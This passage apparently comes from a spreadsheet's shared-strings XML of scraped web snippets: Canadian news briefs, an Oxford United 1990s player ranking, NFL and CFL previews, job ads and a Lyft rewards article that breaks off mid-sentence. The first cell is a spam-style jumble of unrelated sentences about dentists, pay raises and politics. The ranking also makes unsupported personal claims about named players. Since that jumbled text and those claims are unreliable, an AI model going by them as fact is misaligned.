    <t>Canadian employees hoping for larger pay raises next year may be disappointed, says a Willis Towers Watson survey. It reports Canadian employers plan to hold the line on budgeted pay raises in 2020, despite low unemployment, a tight labour market, and volatility in the economy. NationTalk is Canada’s premier Aboriginal newswire, employment, events and tender service. Full text of "The Knights of England.A complete record from the earliest time to the present day of the knights of all the orders of chivalry in England, Scotland, and Ireland, and of knights bachelors, incorporating a complete list of knights bachelors dubbed in Ireland" Originally from Mississauga, Dr. Teresa Chu provides all aspects of dental care for patients of all ages. She actively seeks out the newest technology, best materials, and latest techniques available in the industry today in order to incorporate. Dr. Elnaz Safarinia (Family and cosmetic dentist ) is one of the best dentists in Vaughan/ woodbridge in Ontario. She helps her patients feel comfortable and informed about their care. She is an expert in Invisalign, cosmetic Inlays, Onlays, Top Dental Clinic In Vaughan Top Dental Clinic of 2019 in Vaughan 9581 Weston Road, Unit 1 Vaughan, ON L4H 3A5 Call Directions Website View Full Profile Dr. Allyson Tang Optometrist Top Optical Centre of 2019 in Vaughan 3560 Rutherford Road, Unit 42 Vaughan, ON L4H 3T8 Call. If you’re working around the Orchard area, you’re practically surrounded by overpriced Most Popular Dental Clinic In Vaughan Ontario Tips to finding Vaughan ON dentists Get to know your dentist: The best way to find a new dentist in Vaughan ON is to get to know them personally before you require dental care – we are talking about someone who spends a lot of time poking around. Number 1 Dentist Near Vaughan Ontario Tips Vaughan-Woodbridge candidates have glaringly different priorities – Our middle class tax cuts are helping 26,190 residents in Vaughan-Woodbridge, and a re-elected Liberal government will save. This website stores cookies on your computer. These cookies are used to collect information about how you interact with our website and allow us to remember you. Province launches online tool for seniors to cut down on mailed and faxed documents – Fax machines and snail mail are the preferred method for seniors submitting. seniors in supportive living or long-term. Students will also be working with patients from CPR’s Vaughan office, giving them a unique real world. In a recent report by Health Quality Ontario, over 46,000 in the North East Local Integration. Banks battle it out in health-care sector as Ontario doctors launch own solution – The Ontario Medical Association has been developing its own pension. Scotiabank also struck a 10-year deal with the CMA to. Dentist Vaughan, ON | Vaughan Woodbridge Dental Center If you are looking for a dentist in Vaughan, Ontario you don’t have to look any further than Vaughan Woodbridge Dental, Center.Our Dentists in Vaughan are highly trained and experienced and. Ever wondered why so much importance and stress is given to dental visits? We are here to tell you why you should regularly visit Marble Dental Care Dental clinic at Woodbridge. Our Dental Office Address 125 Hawkview Blvd #6, Vaughan, ON L4H. NDP Leader Jagmeet Singh addresses supporters as he makes a campaign stop in Nanaimo, B.C. Andrew Vaughan/CP If the NDP.</t>
  </si>
  <si>
    <t>Even with preseason just beginning, the Mavericks, led by Luka Doncic and Kristaps Porzingis, are setting expectations high. Source: Sports Business News</t>
  </si>
  <si>
    <t>STAR WARS 9 The Rise of Skywalker trailer will debut on Monday according to an official Disney announcement in a new teaser trailer. Daily Express :: Films Feed</t>
  </si>
  <si>
    <t>This was the NICEST photo that was available. That should tell you something… Via Daily Mail: Monkeys are strapped into metal harnesses, while cats and dogs are left bleeding and dying in footage which animal rights activists claim was filmed at a German toxicology laboratory. The German animal activist organisation Soko Tierschutz together with Cruelty […]</t>
  </si>
  <si>
    <t>Yomi Adegoke</t>
  </si>
  <si>
    <t>Social media has seen humans adapt to a new set of circumstances that we are not necessarily equipped to deal with</t>
  </si>
  <si>
    <t>It’s the final countdown of the top 50 players of the 1990s. You can read Part 1 here, and Part 2. But, here come the heavy hitters that took us through to the end of the millennium. 50 – Anton Rogan A tidy and assured full-back who signed from Sunderland. He didn’t quite get us promotion, but was part of the squad that turned us around before we went up in 1996. They walk amongst us: Now owns a taxi company in Woodstock. 49 – Andy Thomson There were moments when Andy Thomson showed what a light touch and natural eye for goal he had. Sadly those times weren’t very often. They walk amongst us: Now an assistant coach for the Scottish Women’s national team. 48 – Andre Arendse A South African international who played in the World Cup, Andre Arendse was a master of the goalkeeping arts. Those he chose to get involved in; diving, shot stopping and catching were all beneath him. They walk amongst us: Is now a pundit on South African TV channel Supersport as well as a goalkeeping coach. 47 – Steve Foster A brand as much as a player; Foster’s trademark headband and tight curly hair made him one of the most recognised players in the country. Sadly, by the time we got him he was past his best, but still a formidable leader in his time. They walk amongst us: Now lives in Brighton. 46 – Simon Marsh Simon Marsh had a strange career. A contemporary of Paul Powell and Joey Beauchamp among others, Marsh looked all set to be a marginal character. Then he managed to get a run in Malcolm Shotton’s team that vaguely threatened the play-offs in 1998. It resulted in an England Under-21 cap and a transfer to Birmingham City at which point his career hit a brick wall. They walk amongst us: Now runs the sports coaching business 45 – Nick Cusack During quieter years, fans start to look for things to entertainment themselves; that’s when cults rise. The cult of Nick Cusack grew out of the fallow early-90s; an attacking midfielder who couldn’t really score in a team that did even less. At first it was frustrating, then it felt rather appropriate. They walk amongst us: Is literally the deputy chief executive of the PFA. 44 – Mark Stein Mark Stein was one of those players; had the pace and skill to be a world class, and the temperament to disappear. But, he won the League Cup with Luton and played in the Premier League and a Cup Final for Chelsea. Somewhere in amongst it all he played for us. They walk amongst us: Now works in a school for deprived children. 43 – Mark Angel Mark Angel looked like he played bass in a marginal Madchester baggy band with his mop of curly hair gelled into a centre parting. He had his moments but was always overshadowed by other wingers at the club. 42 – Gary Smart During the 90s we were a tidy club made up of tidy players, we had to be, we couldn’t afford to gamble. Gary Smart was one of the tidiest of them all. 41 – Alex Dyer Alex Dyer was a talented and sometimes frustrating player; what he lacked in pace he made up for in his head. A slow burner who earned the respect of the London Road through is relentless consistency. The London Road would echo to the tune of Alex Dyer M’Lord, Alex Dyer. They walk amongst us: Is now the assistant manager for the Scottish national team 40 – Jimmy Phillips The early-90s are a bit of a blind spot for me, I didn’t get to a lot of games because of university and so a number of players swirl around my head as though one. For me, Dave Collins, Nick Cusack, Jimmy Phillips all merge into one. Jimmy Phillips isn’t the other two. They walk amongst us: Is under 23 coach for Bolton Wanderers and managed them briefly last season. 39 – Dave Smith The 90s Simon Clist; was once subjected to a racial slur from Mike Ford in the matchday programme – something to do with his complexion and taxis. He frustrated fans a lot of the time due to his conservative style, but provided a solid platform for Joey Beauchamp, Chris Allen and Stuart Massey during our promotion season. They walk amongst us: Rumour has it, somewhat ironically given Mike Ford’s joke, he set up a chauffeur company for celebrity footballers 38 – Robbie Mustoe Mustoe was one who got away. He broke into the team in 1987 from the youth ranks, but couldn’t get any traction. Eventually, he slipped away to Middlesbrough where he played over 350 games and ended up enjoying a lengthy career in the Premier League. They walk amongst us: Is a Premier League football pundit for NBC in the US 37 – Paul Wanless One of those players whose ranking was probably more down to what he did at other times. A marginal player who graduated from the youth ranks in 1991, but never quite made it and headed off to Cambridge. Returned in 2003 for a few solid years at The Kassam before retiring. 36 – Martin Gray Scuttling midfielder who dedicated his life to perfecting the sideways pass. An unrelentingly frustrating player to watch, yet alongside Dave Smith (39) was the bedrock of the 1996 promotion team. They walk amongst us: Now teaching kids the value of the conservative sideways pass in his own academy. 35 – Pål Lundin Aka – porn star. Comedy Swedish goalkeeper who shared responsibilities for letting in goals during 1999-2000 with Andre Arendse (48). Perhaps most famous for scoring a penalty in a Football League Trophy game against Wycombe. Yep, that was the high point. 34 – Ceri Evans A Crewe fan once told me that he’d heard a fan ref heckle the ref at The Manor asking whether he’d been bribed with a place at the University. Funny right? His head would have exploded if he’d known we had a Rhodes Scholar in the back-four. They walk amongst us: Looks like a Bond villain, but now runs his own medical practice. 33 – Martin Aldridge The saddest story; Aldridge was a natural goal poacher; in any other era, he’d have been a first choice striker, but in the merry-go-round of Paul Moody, David Rush and Nigel Jemson he was mostly used as an impact player. Left the club in 1998 and was killed in a car crash two years later. 32 – Brian Wilsterman The 1990s saw the emergence of the Premier League and all its cosmopolitan spirit. At Oxford United it was a time of great centre-backs. At the intersection of those two things was Brian Wilsterman. We loved him because he was from the same source as Cruyff and Bergkamp, we hated him because he was calamitous. They walk amongst us: Ever the defender, he now runs a security company, while his son plays for FC Lienden. 31 – Paul Reece The more I think about Paul Reece, the smaller he gets. A particularly spongey goalkeeper capable of pulling off remarkable finger-tip saves, even from back-passes. Much of his ranking comes from perhaps the greatest Oxford United goalkeeping display of all time; away at Derby. They walk amongst us: Currently goalkeeping coach in the US. 30 – Mark Watson A majestic centre-back and Canadian international who got caught up in the slow collapse of the club in the late 90s. When the club wanted to give him a new contract in 2000, he simply ran away. They walk amongst us: Is part of the coaching staff at MLS side Minnesota United 29 – Christophe Remy As we teetered on the edge of financial crisis, the presence of the endlessly likeable Frenchman lightened the mood around the place. A very capable full-back and our favourite non-British player of the 90s. They walk amongst us: His Twitter profile says he’s an entrepreneur 28 – Alan Judge A vote more for what he did outside of the 90s. By 1990, Alan Judge’s Oxford career was winding down. But he’d been first choice keeper in Division 1 and played in the Milk Cup winning team. Briefly revived his career in 2003 during an injury crisis. They walk amongst us: Now a driving instructor in Bicester. 27 – Martin Foyle He looked like your dad, but was probably younger than you. There was nothing sexy about Martin Foyle, but he had a knack for scoring goals. They walk amongst us: Head of recruitment at Motherwell in the SPL 26 – Paul Gerrard The best loan player of the 90s; signed from Everton and only played 16 games, but left a lasting impression. Attempts to sign him permanently were thwarted, he was just too good for us. They walk amongst us: Goalkeeping coach at Doncaster Rovers 25 – Les Phillips Probably not the 25th best player of the 90s in truth, but being a member of the 1986 Milk Cup winning team gives you a bit of a boost in these things. 24 – Jamie Cook There was Beauchamp, Allen and Paul Powell and there was Jamie Cook. Often the third wheel in a merry-go-round of wingers during the 90s, he eventually headed off to Crawley and enjoyed a decent career. Returned in 2009, funded partly by the fans, and scored one of the greatest goals at the Kassam against Luton. They walk amongst us: A golf club manager at Heythrop Hall. 23 – Andy Melville The 90s was full of great centre-backs, Andy Melville was among the best. The Welsh international and captain led the team through the early 90s before moving onto better things. Returned as a coach for five years. They walk amongst us: Now works for a sports agency. 22 – Nigel Jemson Arrogant and unpleasant, it was a good job Nigel Jemson scored goals. Nothing dented his belief that the world revolved around him. There were very few who were sad to see him leave. In our second game at the Kassam, Jemson, by that point at Shrewsbury, ran the game, goading us to defeat. Suddenly we missed him dearly. They walk amongst us: Is an estate agent back in Nottingham. 21 – Stuart Massey I’m not much of a fighter, but I will kill and kill again if anyone tries to argue against my view that Stuart Massey is the reason we were promoted in 1996. Beauchamp was too passive, Allen too raw; Massey demanded that players played to his strengths. When he got the ball to his feet he could drop a cross onto Paul Moody’s head from anywhere on the pitch. 20 – Darren Purse Darren Purse was our back-up centre back behind Matt Elliot and Phil Gilchrist. But that masked the real talent he was. Occasionally fiery, it was clear from his early days that he would go onto greater things. They walk amongst us: Director of football at Malcolm Arnold Academy in Northamptonshire. 19 – Kevin Francis Not the most multi-dimensional player we’ve ever seen, but what Kevin Francis did, he did well. I’ve had Amazon Prime deliveries which have arrived quicker than it took for messages to make it from his head to his feet but when you launched a ball into the box usually bounced off his head into the goal. They walk amongst us: Is now a policeman in Canada. 18 – Matt Murphy Matt Murphy was considered an intellectual because he once worked in a bank. The go-to boo boy for any 90s London Roader, nobody around that time thought they were watching the 18th best player of the decade. Yet, that’s what he was, and someone who has rarely been bettered since. 17 – John Byrne A beautifully complete player who was the perfect complement to Paul Moody in attack, it was a partnership too pure to last. But while it did, Byrne, with his trademarked goal celebrations and perfectly quaffed mullet was the cool cat to Paul Moody’s nerdy big brother. They walk amongst us: Always great with his feet; he’s now a musculoskeletal podiatrist. 16 – David Rush After Johnny Byrne (17) left, David Rush was the perfect foil for Paul Moody; he had all the movement Moody didn’t. If you were a defender, even if you could deal with one; the other was a completely different challenge. In the roistering final stages of the 1995/6 season; David Rush was just the player we needed. They walk amongst us: Manager and coach at GPS Academy in Malta. 15 – Paul Simpson The early 90s didn’t create many stars, but Paul Simpson was undoubtedly one. A winger with an eye for goal and a darling to fans of a certain vintage. They walk amongst us: World Cup winning coach of the England Under 20s. 14 – Mickey Lewis Everything that Mickey Lewis lacked in ability he made up for in commitment. In 350 games, he gave everything to the cause. His career petered out where he took up a number of coaching roles and, on two occasions 4 years apart, caretaker manager. 13 – John Durnin The 90s were synonymous with lad culture, so there was nothing better than a player known to enjoy a pint and a fight. So, there was David Rush (16), and before that there was John Durnin. They walk amongst us: Living a quiet life being a violent racist. 12 – Paul Powell There were times when Paul Powell was the best player I ever saw, with the ability to turn a game on its head with a drop of the shoulder and a jinking run. I thought he’d play for England. But it all seemed a bit too much and he never quite hit the dizzy heights. A broken leg stalled his career and he was never the same again. 11 – Mike Ford He had the turning circle of a super tanker and the full range of appalling 90s haircuts, but Mike Ford was a true leader. They walk amongst us: Banbury United manager and lecturer at the Activate Learning Academy in Oxford. 10 – Phil Whitehead God. 9 – Les Robinson The definition of a loyal club servant. There was a period when it was difficult to imagine Oxford United ever starting a game without Les Robinson. It is hard to describe a player who never put a foot wrong in 458 games. They walk amongst us: Head of education at Swancliffe Park, a specialist autism school. So, still being brilliant. 8 – Bobby Ford Bobby Ford looked like the captain of your school’s second eleven. A graceful playmaker, he was one of those players who seemed to loath his talent. Inevitably made his way to the top flight with Sheffield United, but gradually fell out of love with the game. 7 – Dean Windass A brief, ill-advised fling during a period of despair. Windass was bought with money we didn’t have from Aberdeen. He snaffled a pile of goals, including one against Chelsea in the FA Cup which nearly put them out. Was sold to Bradford within a year and the proceeds went into paying Aberdeen the money we hadn’t paid for him. A moment of glorious madness. They walk amongst us: Got caught up in a tax avoidance scheme and now manager at East Hull FC. 6 – Phil Gilchrist With Matt Elliot he made the greatest centre-back pairing the club has ever seen; including Shotton and Briggs. Blessed with pace and strength, Gilchrist was an absolute powerhouse during the mid-90s. They walk amongst us: Senior housemaster at Ratcliffe College in Northampton 5 – Chris Allen The very definition of raw talent. When the pitches were good and there was a Unipart sign to run into there was simply nobody who could touch Chris Allen. With Joey Beauchamp on the other flank, we were flying. Sadly things went sour in 1996 and Allen headed for Nottingham Forest where his career rapidly went downhill. After a period working in a leisure centre, he gradually worked his way back to the club and became one of its most respected coaches. They walk amongst us: Oxford United coach. 4 – Jim Magilton Given the manner of his departure, within 24 hours of putting Leeds United out of the FA Cup in 1994, fourth is a pretty good result for Jim Magilton. Signed from Liverpool, Magilton possessed a touch and fitnesse which propped up an otherwise average mid-90s team. They walk amongst us: Now Elite Performance Director at the IFA. 3 – Paul Moody A battering ram of a striker who looked like he hated the game. Given that he played with Nigel Jemson (22) that was probably true. Yet, despite this he conjured up iconic moments including a sublime hat-trick at Cardiff, the second goal against Peterborough to clinch promotion and an Arab spring which looked like a bag of snooker cues being thrown down the stairs. They walk amongst us: Runs his own building and renovation business. 2 – Matt Elliot Anyone who saw him play compares every Oxford United defender to Matt Elliot. An impenetrable force at the back; unbeatable in the air, calm and cultured on the floor, an attacking threat as much a defensive rock. It’s difficult to imagine a better all-rounder. They walk amongst us: Now runs ME S...</t>
  </si>
  <si>
    <t>English French Hangman game – select either to guess the English or the French word from the head word in the other language. The word to guess is represented by a row of dashes, giving the number of letters. View the history of words used in the game and click on the list to show … Continue reading English French Hangman →</t>
  </si>
  <si>
    <t>Charles LeClaire-USA TODAY Sports The Pittsburgh Steelers’ quarterback has been criticized for his lack of deep throws, but it might just be part of the plan. The Pittsburgh Steelers are constantly a talking point across the NFL landscape, but that doesn’t mean those talking heads are always correct when referring to the black-and-gold. As of late, the most common complain fans have heard is how Mason Rudolph hasn’t been able to throw the football down field. Fans should know there is a difference between “hasn’t been able to” and executing a game plan. This likely stems from the Week 3 loss to the San Francisco 49ers when Rudolph didn’t look comfortable with his reads down field, was confused at times and ultimately relied on checking the ball down to his receivers. The Week 4 Monday night win over the Cincinnati Bengals was a completely different offensive game plan, and one Rudolph executed to near perfection. Don’t believe me? Just take a look at what NFL Network’s Brian Baldinger put together on his verified Twitter feed regarding Rudolph’s first career win as a starter. .@steelers @Rudolph2Mason had a nice game on #MNF getting his 1st @NFL win and OC, Randy Fichtner called a great game to help his first year QB. If you like the headband &amp; t-shirt go to FB and Kenson Kreations #BaldysBreakdowns pic.twitter.com/4v4XsW3f17 — Brian Baldinger (@BaldyNFL) October 2, 2019 To go a hit further, when Rudolph spoke with the media Thursday after practice, he was asked about the lack of shots downfield and he had a clear cut answer. Going into the Bengals game the Steelers really liked their matchups with their running backs out in space on Cincinnati linebackers. There was your game plan, and you can see how the check downs and jet-sweep plays maximized these matchups…all the way to the team’s first win of the season. Check out Rudolph’s full media session below: .@Rudolph2Mason speaks about the game ahead, Nick Vannett, James Washington, the #Steelers-Ravens rivalry &amp; more. pic.twitter.com/AWZthRfCXB — Pittsburgh Steelers (@steelers) October 3, 2019 So while national media will criticize Rudolph for not driving the ball downfield, the Steelers, and Rudolph, are content sticking with the plan as long as it is successful. It makes you wonder what they might have in store for the Baltimore Ravens this Sunday at 1 p.m. ET at Heinz Field.</t>
  </si>
  <si>
    <t>It never was a pure democracy, by design it is a representative republic. But Brennan sounds really worried. Via Washington Examiner: Former CIA Director John Brennan declared that the United States is “no longer a democracy” under the leadership of President Trump. Brennan, who has been sharply critical of Trump since leaving office in January […]</t>
  </si>
  <si>
    <t>The decline in Canada's police ranks comes as the national crime rate increased for the fourth straight year, according to Statistics Canada.</t>
  </si>
  <si>
    <t>The European Union says it is up to the UK government to tell the 27 EU member states “as soon as possible” what action it will take after the Brexit deal was not voted on Saturday.</t>
  </si>
  <si>
    <t>Caitlin Fitzsimmons</t>
  </si>
  <si>
    <t>A new food app has been designed to lure customers off the couch and back into restaurants through discounted meal deals.</t>
  </si>
  <si>
    <t>A 15-year-old has been charged with the murder of a boy in east London late last week. Read more? Click here</t>
  </si>
  <si>
    <t>Source: https://www.wired.com/story/whats-up-with-that-death-star-wreckage-in-rise-of-skywalker Whoa! Is That Death Star Wreckage on That Planet? A physicist analyzes that colossal Easter egg in the latest *Star Wars* trailer. Do the filmmakers understand the gravity of the situation? Source: https://www.wired.com/story/whats-up-with-that-death-star-wreckage-in-rise-of-skywalker The post Whoa! Is That Death Star Wreckage on That Planet? appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Morgan Stanley capped quarterly earnings from big U.S. banks with a higher-than-expected profit on strength in bond trading and M&amp;A advisory, easing concerns that market turmoil would weigh on banks' Wall Street-related businesses.</t>
  </si>
  <si>
    <t>A round-up of today’s NUFC news and gossip: Salomon Rondon has admitted he would’ve signed permanently at St James’ Park if Mike Ashley had sanctioned a deal – Full story here. Richard Keys claims Rafa Benitez wanted the Everton job while he was at Newcastle – and would ‘walk’ from China if Silva was sacked and he was approached – Full story here. David Meyler has had his say on some of the criticism Steve Bruce has received on Tyneside, revealing how he’s only heard good things from Newcastle players he’s been speaking to – Full story here. North-east rivals Sunderland have sacked Jack Ross – and it’s claimed the proposed takeover on Wearside has also collapsed – Full story here. Sean Longstaff believes his brother Matty has been ‘best player’ at Newcastle since pre-season training began – claiming he’s been unlucky not to play more – Full story here. Fabian Schar is not shocked by Matty Longstaff’s burst onto the first-team scene at NUFC, claiming he’s trained ‘very well’ in the weeks building up to his Premier League debut – Full story here. Allan Saint-Maximin has vowed to run with the ball and dribble past defenders following his impressive first league start at St James’ Park on Sunday – Full story here. (Fancy writing for us? Send any articles/ideas over to us at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</t>
  </si>
  <si>
    <t>Keri McKibbin</t>
  </si>
  <si>
    <t>When the ministers from the government show up tomorrow at 1115am, we have a secret weapon in store for them. Of course, I will show them the new equipment, of course I will tell them the evolution of the gym, tell them proudly about our kids and adults classes, the free fruit from the Coop, and I will be showing them the new outside and what’s to come. BUT, the secret weapon is our people. The stories YOU will be sharing with them tomorrow is our nuclear weapon that bowls over and inspires the most hardened of characters. We all have similar ability, but it’s the ones that grab that ability and run with it are the ones who inspire me the most. When those people arrive tomorrow, I know have an easy hour because I hand them over to you lot, great inspirational characters who speak so eloquently and passionately about your often very difficult journey in life. How you put your trust into exercise and eating right, and how it lifted you out of the gloom and hardship that you may have been feeling at that particular time in your life. The greatest pleasure I will have tomorrow is not the visitors arriving although they are very welcome, but the stories you will come out with and how life changed when you became more active, when you started eating right, and most importantly, all of that gave you the power to believe in yourself once again and set your life in an incredible direction once again. Tomorrow is about you and telling your story, let’s be proud of what we have achieved against the odds, and get ready to hit them with everything we have.</t>
  </si>
  <si>
    <t>WITH the best coastline in the country, it’s no surprise some of Australia’s best ocean photographers choose to call the Gold Coast home.</t>
  </si>
  <si>
    <t>Which diet should I adopt for weight loss? Stop choosing to adopt weight loss diets because they have worked for others. Everybody is different, from our bodies to our food preferences. Original Source Follow us on Twitter The post Which diet should I adopt for weight loss? appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Some conflicting reports have emerged over the past week regarding the fee Newcastle will have to pay next summer if we wish to sign Jetro Willems on a permanent deal. The Chronicle’s Mark Douglas stated last week that it was his understanding we’d have the opportunity to sign the Dutchman for “less than £6m” if we decided to turn his loan move into a permanent deal, however German outlet BILD reported yesterday that the clause in his loan deal allows us to sign him for £10m. Either way, whether it’s £4m, £6m or £10, it looks like we’ll have the chance to sign the 25-year-old for a reasonable fee next summer if he continues to impress. Bundesliga side Frankfurt paid £7m to sign him from PSV two years ago, and while he failed to impress in Germany (albeit while playing in an unfamiliar central midfield role), he’s looked the part at Newcastle over the last few weeks. Some have urged Newcastle to get the deal done in January to avoid another club swooping in next summer, however the Chronicle report that we’ll bide our time and continue to assess his performances – despite being impressed with what we’v seen so far. After all, I don’t see Mike Ashley committing to a deal that may be worth £10m plus when we’re currently one of the favourites to go down. (Fancy writing for us? Send any articles/ideas over to us at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</t>
  </si>
  <si>
    <t>Mike Stubbs</t>
  </si>
  <si>
    <t>The Knights kicked off Thanksgiving weekend with an overtime loss to Owen Sound on Friday night at Budweiser Gardens.</t>
  </si>
  <si>
    <t>Based on direct observations researchers have discovered massive filaments between galaxies in a proto-cluster, extending over more than 1 million parsecs and providing the fuel for intense formation of stars and the growth of super massive black holes within the proto-cluster.</t>
  </si>
  <si>
    <t>Pharien - Fall Apart is OUT NOW on Spinnin' NEXT! Like this track? Download on Beatport or add it to your favourite Spotify/Apple Music playlist by clicking HERE: https://spinninnext.release.link/fall-apart!YT Make sure to subscribe to Spinnin' Records: http://bit.do/spinnintv ..and turn on notifications to stay updated with all new uploads!🔔 Join our Spinnin' Records Top 100 Playlist […] The post Pharien – Fall Apart (Official Music Video) appeared first on Dubster.</t>
  </si>
  <si>
    <t>The two tennis greats had unblemished records at the Shanghai Masters, but that all ended on a good day for the next generation in China.</t>
  </si>
  <si>
    <t>The NBA-China Disaster Is a Stress Test for Capitalism Chinese companies, furious over public sympathy for Hong Kong, were swift in their vengeance. They suspended licensing agreements with the NBA. Original Source Follow us on Twitter The post The NBA-China Disaster Is a Stress Test for Capitalism appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Actor also called out ‘liberal fascism’ in dictating that only certain actors can play minority ethnic and gay roles See full article at Independent.co.uk » The post Sienna Miller says she called Harvey Weinstein ‘Pops’ appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Dealer! Ever wonder how Donald Trump became President and more importantly who taught him the ropes? Get the inside scoop on the path to the White House with Where’s My Roy Cohn? Meet the real kingmaker in this fascinating look at the man who helped mound American politics for generations. Sony Pictures Classics and Mongrel Media Present this no holds barred look at a giant behind the scenes power brokers. Check out this enlightening story at the International Village Cinemas. Viewers will be simply spellbound as the filmmakers here explore Cohn’s upbringing and then ascendency into the public spotlight. Politics was definitely in this man’s blood. Look at how he first made a name for himself as a prosecutor in what was then the trial of the century before gaining even more prominence / notoriety as chief counsel for none other than Senator Joe McCarthy in his infamous communist hearings. From there this slick smart New Yorker became a house-hold name. Considered to be the ultimate manipulator it’s fascinating to see Cohn work his magic and claw his way to the top. Links to high society, Hollywood, the Mob and The White House, then and now, are all presented in this outstanding documentary. Complete with fascinating interviews with Cohn when he was just beginning his flamboyant career to revealing candid conversations with his family paint a full picture of a man whose talents to win were second to none. How Donald Trump must miss his mentor as he seemingly drifts from crisis to crisis.</t>
  </si>
  <si>
    <t>We are moving our office and require extra hands to move a few boxes for shredding this Friday Oct 11th. There will likely be another day required to move dismantled furniture to an awaiting vehicle. Serious Inquiries only, not cash work. Weekly pay NO STAIRS Office location on Kilborn Ave. Compensation will be .. Read more</t>
  </si>
  <si>
    <t>VANCOUVER — The implications surrounding Saturday’s matchup between the BC Lions and Edmonton Eskimos have been well documented, and with a playoff spot still up for grabs, Lions head coach DeVone Claybrooks is looking forward to the test that the Esks present. “There’s desperation for both of us in actuality,” Claybrooks told BCLions.com. “They started out hot and fizzled; you want to go into the last third of the season on a roll and they’re trying to get their things together. They lost a quarterback but like they say, when you’ve got a dog in a corner, it’ll snap to get out and we understand that. (There are) a lot of ties between each organization and we have some of their former players and history with their coaching staff. “It’s going to be a fun game. We’re a totally different team than they saw their first two times they played us and it’ll be exciting.” RELATED » Steinberg’s MMQB: A long time coming » Landry’s 5 takeaway’s from Week 17 » Playoff Scenarios: Ticats have division in their sights The Leos are coming into this game at the perfect time, having won their last four games. The latest victory in the run came last Saturday when BC rolled to a 55-8 victory over the Toronto Argonauts at home. After beginning the year 1-10, it would’ve been natural to think that the Lions may have been out of the playoff picture. However, they’ve still got a chance with three games left in their schedule. Edmonton has been streaky as of late, losing three of their last four games since Trevor Harris went down with an injury. Logan Kilgore has filled in during that time and thrown for 921 yards and four touchdowns in four outings. With Harris starting to get back to full health, it’s unclear who will be the starter on Saturday, but the Lions will be prepared defensively regardless of who the man under centre is for the Esks. “The offence is going to be the offence,” Claybrooks said. “Maas is going to run what he wants to run. They have great playmakers on the perimeter and in the backfield so you get the ball in their hands and they can make some things happen. It doesn’t matter who’s the catalyst there, it’s about neutralizing the playmakers.” Claybrooks will be looking to T.J. Lee and the rest of the secondary to help slow down the Edmonton passing game. Lee led the way in Week 17 against the Argos, getting two tackles and an interception in the win. He’s got two picks in his last three games and is a favourite of the Lions’ coaching staff. “A lot of starters or five- or six-year veterans feel they’re too good for special teams,” Claybrooks said. “That’s the one thing I love about our group and T.J. is one of those guys that (says) ‘put me anywhere, coach. I’ll do whatever you want me to do, I’m just trying to win.’ These guys don’t have any egos and he’s one of those guys that leads meetings and the DBs and special teams. “He’s plug and play and I’m just happy to have him.” It’ll take more than just a solid effort on the defensive end to win this game. Luckily for the Lions, they’re offence is firing on all cylinders. Quarterback Mike Reilly has been sacked just three times over the team’s winning streak. That’s allowed him to set his feet and find his top receiving targets — specifically, Bryan Burnham. The 29-year-old has quietly put together the best season of his CFL career, amassing 1,300 yards and nine touchdowns on 88 catches through 14 games. In three of his last five games, he’s posted at least eight catches, 125 yards, and a touchdown. He’s also scored a major in five of his last six outings, with a three-score outing coming against Toronto in Week 17. “You actually take it for granted how great of a receiver he is because he does it day in and day out,” Claybrooks said of his star pass-catcher. “In practice, we see one-handed catches and everything. Markus (Howell) does a great job with those guys and Burnham plays like he practices. He puts the time in, he runs every route full speed like he’s getting the ball so it’s an adjustment at game time where he has to kick into a new gear. “It’s been amazing to watch things manifest because of the way he works and the time he puts in.” BC Lions receiver Bryan Burnham (16) and quarterback Mike Reilly (13) celebrate a touchdown against the Toronto Argonauts. (The Canadian Press) The Lions need this game to keep their postseason aspirations alive. With a victory or a tie, the Eskimos would lock up the final spot in the playoffs via the crossover. Whether the team is able to get the job done or not, Claybrooks is looking at this game as another opportunity for his squad to grow. “When you’re trying to establish a culture, it’s going to take a while and we’re not even remotely close to where we want to be but we’re working hard, still doing the little things, and continuing to buy in and continuing to fight and continuing to believe,” he said. “As long as you do that, you’ve got a chance and we’ve still got a chance. “… This is just another step of making BC a team to be reckoned with in this league.”</t>
  </si>
  <si>
    <t>Job requirements/details for Ski Tech: – We require a Full Time Tech – Must be comfortable operating machinery – Attention to detail working in fast passed environment – Knowledge or experience doing Wax, Sharpen, Appoxy, do Adjustments &amp; all other maintenance/tuning – Assist &amp; handle the Ski / Board Rental fittings &amp; binding adjustments – .. Read more</t>
  </si>
  <si>
    <t>Sydney Roosters coach Trent Robinson once described his team's defence as a "living and breathing thing" and he's using it to set course for another NRL title.</t>
  </si>
  <si>
    <t>http://puretourism.co.uk/dinghy-and-catamaran-sailing-holidays-kadikalesi-nr-turgutreis-bodrum-turkey Funboat sailing in Bodrum, great wind, good kit and lots of fun! Why not have a fun sailing holiday at our centre in Kadikalesi! source The post puretourism.co.uk – Video of Funboat sailing in Kadikalesi near Turgutreis, Bodrum, Turkey appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Police have launched an investigation into a bar bust-up that took place in Dundee on Sunday.</t>
  </si>
  <si>
    <t>Lyft Lyft has unveiled a new points-based rewards system for drivers. And while many of the perks, like credits for Lyft rides, may not excite everyone. There’s one perk for the most elite drivers that’s likely to become a big incentive: trip details. Usually, drivers are merely told there’s a ride-request nearby, and can choose to accept or decline. That lack of insight makes it hard to know if a ride is worth it. For example, driving 15 minutes away for a 5-minute fare, might not be worth a driver’s time. “It’s not about what you make on a trip, it’s about how much of your time it’s going to take,” Michael, a driver in Washington DC, said in a recent interview. His last name has been omitted for privacy. Other drivers developed their own tools for seeing trip details, like accepting the ride from a block away, and cancelling before getting to the passenger if they didn’t want to take it. Seeing a trip’s destination was an intermittent feature during testing, a Lyft spokesperson said, but this is the first time it’s been codified transparently like this. Those tests sparked interest among drivers online over recent months, and led to much speculation about which markets, or which trip acceptance rates, would trigger the app to show trip details ahead of a ride. Some of those drivers said they started to see the details when their acceptance rates hit 90% or higher, depending on where they work. That’s key, given that drivers still risk being deactivated if they cancel 15 rides in their last 100 acceptances, according to Lyft’s published policies. To unlock the new features, drivers have to reach the gold tier of Lyft’s rewards program by earning points. That second rung also includes a 4% cash back on gas when using Lyft’s debit card and $5 cash back for every 500 points, but it’s not clear how many points it will take to level up to each tier. Uber, by contrast, 